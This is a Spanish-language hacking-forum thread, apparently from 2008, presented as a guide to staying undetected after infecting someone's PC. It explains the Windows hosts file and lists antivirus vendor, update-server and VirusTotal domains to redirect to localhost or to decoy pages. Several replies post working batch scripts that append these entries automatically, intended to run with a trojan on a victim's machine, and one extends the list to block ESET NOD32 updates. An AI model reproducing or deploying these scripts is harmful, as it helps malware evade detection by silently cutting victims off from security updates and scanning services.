• Manuales y Tutoriales

  • Aquí puedes postear manuales referentes a malware y herramientas relativas a la tematica del foro.
Aquí puedes postear manuales referentes a malware y herramientas relativas a la tematica del foro.
 #34994  por 1995
 
Mini Guia para evitar ser detectados una ves infectado un Pc.

¿Qué es el archivo Host?
Código: Seleccionar todo
Es un archivo de texto que contiene direcciones IP y nombres de sitios web relacionados en pares unívocos.
¿Cuál es la Ubicación del archivo host?:
En sistemas Windows 95/98/Me:
Código: Seleccionar todo
C:\Windows
En sistemas Windows NT/2000/2003
Código: Seleccionar todo
C:\Winnt\System32\drivers\etc
En sistemas Windows XP
Código: Seleccionar todo
C:\Windows\System32\drivers\etc
¿Cómo trabaja?
Código: Seleccionar todo
Cuando una máquina se conecta a una red y desde una aplicación hacemos una petición para ver un recurso de red, lo hacemos con el léxico que no es común, es decir, mediante palabras; usamos Nombres de Dominio.

Para la máquina, estos Nombres de Dominio, no tienen mayor sentido, por lo tanto, han de traducirse a algo que puedan entender antes de proveernos con un resultado o respuesta, para hacer esto, recurren a máquinas con listas que relacionan los Nombres de Dominio con sus respectivas direcciones IP.

Esta solicitud, suele ser realizada a unas máquinas específicas que se encuentran en diversas partes del mundo; a su vez, estas máquinas han de responder las solicitudes de cientos o miles de máquinas, lo cual puede resultar un poco complicado. Sin embargo, el sistema cuenta con una herramienta interna y sencilla para evitar estas peticiones, al menos algunas de ellas. Como podrán imaginar, esta herramienta es el archivo hosts.

Hay otras herramientas más poderosas y completas, pero nuevamente, eso queda fuera del alcance de este texto.

Así que el fin principal de este archivo, es descargar de trabajo a los Servidores de Nombres de Dominio y acelerar la obtención de resultados en las máquinas locales al solicitar recursos de red.
Abrir el Archivo Host con el Block de Notas que trae Windows:
Código: Seleccionar todo
# Copyright (c) 1993-1999 Microsoft Corp.
#
# Éste es un ejemplo de archivo HOSTS usado por Microsoft TCP/IP para Windows.
#
# Este archivo contiene las asignaciones de las direcciones IP a los nombres de
# host. Cada entrada debe permanecer en una línea individual. La dirección IP
# debe ponerse en la primera columna, seguida del nombre de host correspondiente.
# La dirección IP y el nombre de host deben separarse con al menos un espacio.
#
#
# También pueden insertarse comentarios (como éste) en líneas individuales
# o a continuación del nombre de equipo indicándolos con el símbolo "#"
#
# Por ejemplo:
#
#      102.54.94.97     rhino.acme.com          # servidor origen
#       38.25.63.10     x.acme.com              # host cliente x

127.0.0.1       localhost

Usando el Archivo Host para Evitar actualización de Antivirus y páginas de Av online
Código: Seleccionar todo
A continuación de la línea 127.0.0.1     Localhost podemos agregar las siguientes:

127.0.0.1 avp.com
127.0.0.1 ca.com
127.0.0.1 customer.symantec.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mast.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 microsoft.com
127.0.0.1 my-etrust.com
127.0.0.1 nai.com
127.0.0.1 networkassociates.com
127.0.0.1 pandasoftware.com
127.0.0.1 rads.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 sophos.com
127.0.0.1 symantec.com
127.0.0.1 trendmicro.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 viruslist.com
127.0.0.1 virustotal.com
127.0.0.1 www.avp.com
127.0.0.1 www.f-secure.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.mcafee.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.my-etrust.com
127.0.0.1 www.nai.com
127.0.0.1 www.networkassociates.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.sophos.com
127.0.0.1 www.symantec.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.virustotal.com

Con esto al intentar ingresar a cualquiera de estas webs mostrará un error la página

Código: Seleccionar todo
No se puede conectar

Firefox no puede establecer una conexión con el servidor en XYZ.


    *   El sitio podría estar no disponible temporalmente o
         demasiado ocupado. Vuelva a intentarlo en unos momentos.

    *   Si no puede cargar ninguna página, compruebe la conexión
         de red de su ordenador.

    *   Si su ordenador o red están protegidos por un cortafuegos
         o proxy, asegúrese de que Firefox tiene permiso para
         acceder a la web.
 


¿El archivo Host solo bloquea las páginas webs en los navegadores?
Código: Seleccionar todo
No, el archivo Host bloquea cualquier acceso relacionado a las páginas, direcciones, ip en cuestión, por ende si un antivirus se actualiza descargando la base de datos desde www.av.com/base/654 solo bastará con agregar al Host: [b]127.0.0.1 www.av.com[/b], para así asegurarnos de su bloqueo

Mostrar errores en las páginas es muy notorio, ¿Qué mas puedo hacer?
Código: Seleccionar todo
Si bloquear las paginas es muy notorio lo que se puede hacer es redirigir a otra, mediante el siguiente ejemplo
200.10.226.218 www.paginaabloquear.com

Si ingresas 200.10.226.218 en tu navegador te mostrará la web de Google, si agregas la linea en cuestión al archivo Host al intentar entrar a www.paginaabloquear.com nos llevará a la pagina de Google.

¿Cómo obtener la IP de una página web?

Mediante la consola de Windows, es decir, en Inicio -> Ejecutar -> escribir "cmd" (sin las comillas) y dar enter:

Abrirá la consola de windows, luego allí ingresamos el siguiente comando:
Código: Seleccionar todo
ping www.google.com
y veremos el siguiente resultado:
Código: Seleccionar todo
C:\Documents and Settings\1995>ping www.google.com

Haciendo ping a www.l.google.com [[b]200.10.226.218[/b]] con 32 bytes de datos:

Respuesta desde 200.10.226.218: bytes=32 tiempo=21ms TTL=58
Respuesta desde 200.10.226.218: bytes=32 tiempo=19ms TTL=58

Estadísticas de ping para 200.10.226.218:
    Paquetes: enviados = 2, recibidos = 2, perdidos = 0
    (0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
    Mínimo = 19ms, Máximo = 21ms, Media = 20ms

Como verán la IP de Google.com es 200.10.226.218


El resto es solo parte de su imaginación, como por ejemplo crear una página web en blanco que contenga un error diciendo por ejemplo "Página en construcción, disculpe las molestias, etc" y redirigir hacia ella con esto levantaríamos menos sospechas.

Si deseas compartir ideas, scripts, etc usa el mismo tema.


Saludos
Código: Seleccionar todo
Una buena idea podría ser crear un .Bat que agrege estás lineas automaticamente al archivo Host al ejecutar el troyano

 #35038  por b#
 
1995 escribió:Una buena idea podría ser crear un .Bat que agrege estás lineas automaticamente al archivo Host al ejecutar el troyano
Acá dejo el código del .Bat para Windows XP:
Código: Seleccionar todo
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
Saludos.
Última edición por b# el 27 Nov 2008, 22:52, editado 1 vez en total.

Re:

 #35053  por 1995
 
b#

Exactamente lo que tenía en mente

Muchas gracias b#

 #35056  por b#
 
Le agregué una opción para elejir la versión de Windows:
Código: Seleccionar todo
@Echo OFF
:Inicio
Echo Sistema operativo:
Echo.
Echo 1. Windows 95/98/Me
Echo 2. Windows NT/2000
Echo 3. Windows XP
Echo 4. Windows 2003
Echo 5. Windows Vista
Echo.
Echo 6. Salir
Set /p OP=
If %OP%==1 CLS&&Set Hosts=\Windows\hosts&&GoTo Hosts
If %OP%==2 CLS&&Set Hosts=\WINNT\System32\drivers\etc\hosts&&GoTo Hosts
If %OP%==3 CLS&&Set Hosts=\WINDOWS\system32\drivers\etc\hosts&&GoTo Hosts
If %OP%==4 CLS&&Set Hosts=\WINDOWS\system32\drivers\etc\hosts&&GoTo Hosts
If %OP%==5 CLS&&Set Hosts=\WINDOWS\system32\drivers\etc\hosts&&GoTo Hosts
If %OP%==6 Exit
:Hosts
Echo. >> %Hosts%
Echo 127.0.0.1 avp.com >> %Hosts%
Echo 127.0.0.1 ca.com >> %Hosts%
Echo 127.0.0.1 customer.symantec.com >> %Hosts%
Echo 127.0.0.1 dispatch.mcafee.com >> %Hosts%
Echo 127.0.0.1 download.mcafee.com >> %Hosts%
Echo 127.0.0.1 f-secure.com >> %Hosts%
Echo 127.0.0.1 kaspersky.com >> %Hosts%
Echo 127.0.0.1 kaspersky-labs.com >> %Hosts%
Echo 127.0.0.1 liveupdate.symantec.com >> %Hosts%
Echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %Hosts%
Echo 127.0.0.1 mast.mcafee.com >> %Hosts%
Echo 127.0.0.1 mcafee.com >> %Hosts%
Echo 127.0.0.1 microsoft.com >> %Hosts%
Echo 127.0.0.1 my-etrust.com >> %Hosts%
Echo 127.0.0.1 nai.com >> %Hosts%
Echo 127.0.0.1 networkassociates.com >> %Hosts%
Echo 127.0.0.1 pandasoftware.com >> %Hosts%
Echo 127.0.0.1 rads.mcafee.com >> %Hosts%
Echo 127.0.0.1 secure.nai.com >> %Hosts%
Echo 127.0.0.1 securityresponse.symantec.com >> %Hosts%
Echo 127.0.0.1 sophos.com >> %Hosts%
Echo 127.0.0.1 symantec.com >> %Hosts%
Echo 127.0.0.1 trendmicro.com >> %Hosts%
Echo 127.0.0.1 updates.symantec.com >> %Hosts%
Echo 127.0.0.1 update.symantec.com >> %Hosts%
Echo 127.0.0.1 us.mcafee.com >> %Hosts%
Echo 127.0.0.1 viruslist.com >> %Hosts%
Echo 127.0.0.1 virustotal.com >> %Hosts%
Echo 127.0.0.1 www.avp.com >> %Hosts%
Echo 127.0.0.1 www.f-secure.com >> %Hosts%
Echo 127.0.0.1 www.grisoft.com >> %Hosts%
Echo 127.0.0.1 www.kaspersky.com >> %Hosts%
Echo 127.0.0.1 www.mcafee.com >> %Hosts%
Echo 127.0.0.1 www.microsoft.com >> %Hosts%
Echo 127.0.0.1 www.moneybookers.com >> %Hosts%
Echo 127.0.0.1 www.my-etrust.com >> %Hosts%
Echo 127.0.0.1 www.nai.com >> %Hosts%
Echo 127.0.0.1 www.networkassociates.com >> %Hosts%
Echo 127.0.0.1 www.pandasoftware.com >> %Hosts%
Echo 127.0.0.1 www.sophos.com >> %Hosts%
Echo 127.0.0.1 www.symantec.com >> %Hosts%
Echo 127.0.0.1 www.trendmicro.com >> %Hosts%
Echo 127.0.0.1 www.virustotal.com >> %Hosts%
Echo Listo!
Echo.
Echo 1. Inicio
Echo 2. Salir
Set /p IS=
If %IS%==1 GoTo Inicio
If %IS%==2 Exit
Saludos.
 #35149  por 1995
 
rodolfocde escribió:hola muchas gracias x el tuto
tengo una pregunta
ese .bat le enviamos a nuestra victima y lo ejecutamos en su pc y ahi que pasa?
Hola, lo que sucede al abrir el Bat, es agregar al Host las líneas escritas, por lo que nos ahorramos tiempo y trabajo en hacer lo que expliqué arriba.

Saludos

 #35251  por b#
 
Creo que no está, pero en esta web aparecen los Update Servers.

Re:

 #36814  por gatok47
 
b# escribió:Creo que no está, pero en esta web aparecen los Update Servers.
Compa quedaria asi para dejar inservible el Nod32 fijad hasta el final los server de nod32
Código: Seleccionar todo
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
echo 127.0.0.1 u20.eset.com >> %hosts%
echo 127.0.0.1 u21.eset.com >> %hosts%
echo 127.0.0.1 u22.eset.com >> %hosts%
echo 127.0.0.1 u23.eset.com >> %hosts%
echo 127.0.0.1 u24.eset.com >> %hosts%
echo 127.0.0.1 89.202.157.135 >> %hosts%
echo 127.0.0.1 89.202.157.136 >> %hosts%
echo 127.0.0.1 89.202.157.137 >> %hosts%
echo 127.0.0.1 89.202.157.138 >> %hosts%
echo 127.0.0.1 89.202.157.139 >> %hosts%
echo 127.0.0.1 u30.eset.com >> %hosts%
echo 127.0.0.1 u31.eset.com >> %hosts%
echo 127.0.0.1 u32.eset.com >> %hosts%
echo 127.0.0.1 u33.eset.com >> %hosts%
echo 127.0.0.1 u34.eset.com >> %hosts%
echo 127.0.0.1 u35.eset.com >> %hosts%
echo 127.0.0.1 u36.eset.com >> %hosts%
echo 127.0.0.1 u37.eset.com >> %hosts%
echo 127.0.0.1 u38.eset.com >> %hosts%
echo 127.0.0.1 u39.eset.com >> %hosts%
echo 127.0.0.1 u40.eset.com >> %hosts%
echo 127.0.0.1 u41.eset.com >> %hosts%
echo 127.0.0.1 u42.eset.com >> %hosts%
echo 127.0.0.1 u43.eset.com >> %hosts%
echo 127.0.0.1 u44.eset.com >> %hosts%
echo 127.0.0.1 u45.eset.com >> %hosts%
echo 127.0.0.1 u46.eset.com >> %hosts%
echo 127.0.0.1 u47.eset.com >> %hosts%
echo 127.0.0.1 u48.eset.com >> %hosts%
echo 127.0.0.1 u49.eset.com >> %hosts%
Saludos

 #36816  por b#
 
Muy bien gatok47, recuerda que no deja inservible al Nod32, sino que no deja actualizarlo.

Saludos.
 #38877  por l0ko
 
Buenas

Gracias por la aportación me gusto mucho! qué suerte que el XP y el Vista usen la misma dirección host :D

Por cierto : gatok47
gatok47 escribió:
Código: Seleccionar todo
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
echo 127.0.0.1 u20.eset.com >> %hosts%
echo 127.0.0.1 u21.eset.com >> %hosts%
echo 127.0.0.1 u22.eset.com >> %hosts%
echo 127.0.0.1 u23.eset.com >> %hosts%
echo 127.0.0.1 u24.eset.com >> %hosts%
echo 127.0.0.1 89.202.157.135 >> %hosts%
echo 127.0.0.1 89.202.157.136 >> %hosts%
echo 127.0.0.1 89.202.157.137 >> %hosts%
echo 127.0.0.1 89.202.157.138 >> %hosts%
echo 127.0.0.1 89.202.157.139 >> %hosts%
echo 127.0.0.1 u30.eset.com >> %hosts%
echo 127.0.0.1 u31.eset.com >> %hosts%
echo 127.0.0.1 u32.eset.com >> %hosts%
echo 127.0.0.1 u33.eset.com >> %hosts%
echo 127.0.0.1 u34.eset.com >> %hosts%
echo 127.0.0.1 u35.eset.com >> %hosts%
echo 127.0.0.1 u36.eset.com >> %hosts%
echo 127.0.0.1 u37.eset.com >> %hosts%
echo 127.0.0.1 u38.eset.com >> %hosts%
echo 127.0.0.1 u39.eset.com >> %hosts%
echo 127.0.0.1 u40.eset.com >> %hosts%
echo 127.0.0.1 u41.eset.com >> %hosts%
echo 127.0.0.1 u42.eset.com >> %hosts%
echo 127.0.0.1 u43.eset.com >> %hosts%
echo 127.0.0.1 u44.eset.com >> %hosts%
echo 127.0.0.1 u45.eset.com >> %hosts%
echo 127.0.0.1 u46.eset.com >> %hosts%
echo 127.0.0.1 u47.eset.com >> %hosts%
echo 127.0.0.1 u48.eset.com >> %hosts%
echo 127.0.0.1 u49.eset.com >> %hosts%
Saludos
Tu agregaste todos los Update Servers de el NoD32 pero el resto de Av’S tienen más Update Servers ¿?
No podrán así actualizarse o poniendo simplemente la web como esta puesta evitas que la web los redirecciones a otro Update Servers ¿?

Saludos
 #38893  por gatok47
 
l0ko escribió:Buenas

Gracias por la aportación me gusto mucho! qué suerte que el XP y el Vista usen la misma dirección host :D

Por cierto : gatok47
gatok47 escribió:
Código: Seleccionar todo
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
echo 127.0.0.1 u20.eset.com >> %hosts%
echo 127.0.0.1 u21.eset.com >> %hosts%
echo 127.0.0.1 u22.eset.com >> %hosts%
echo 127.0.0.1 u23.eset.com >> %hosts%
echo 127.0.0.1 u24.eset.com >> %hosts%
echo 127.0.0.1 89.202.157.135 >> %hosts%
echo 127.0.0.1 89.202.157.136 >> %hosts%
echo 127.0.0.1 89.202.157.137 >> %hosts%
echo 127.0.0.1 89.202.157.138 >> %hosts%
echo 127.0.0.1 89.202.157.139 >> %hosts%
echo 127.0.0.1 u30.eset.com >> %hosts%
echo 127.0.0.1 u31.eset.com >> %hosts%
echo 127.0.0.1 u32.eset.com >> %hosts%
echo 127.0.0.1 u33.eset.com >> %hosts%
echo 127.0.0.1 u34.eset.com >> %hosts%
echo 127.0.0.1 u35.eset.com >> %hosts%
echo 127.0.0.1 u36.eset.com >> %hosts%
echo 127.0.0.1 u37.eset.com >> %hosts%
echo 127.0.0.1 u38.eset.com >> %hosts%
echo 127.0.0.1 u39.eset.com >> %hosts%
echo 127.0.0.1 u40.eset.com >> %hosts%
echo 127.0.0.1 u41.eset.com >> %hosts%
echo 127.0.0.1 u42.eset.com >> %hosts%
echo 127.0.0.1 u43.eset.com >> %hosts%
echo 127.0.0.1 u44.eset.com >> %hosts%
echo 127.0.0.1 u45.eset.com >> %hosts%
echo 127.0.0.1 u46.eset.com >> %hosts%
echo 127.0.0.1 u47.eset.com >> %hosts%
echo 127.0.0.1 u48.eset.com >> %hosts%
echo 127.0.0.1 u49.eset.com >> %hosts%
Saludos
Tu agregaste todos los Update Servers de el NoD32 pero el resto de Av’S tienen más Update Servers ¿?
No podrán así actualizarse o poniendo simplemente la web como esta puesta evitas que la web los redirecciones a otro Update Servers ¿?

Saludos
Con esto almenos el NOD32 no se actualizara mas, abra que buscar los demas servidores de los demas antivirus, ojala lo vayamos agrandando el code, en estos dias le agregare otros servidores de actualizacion de los AV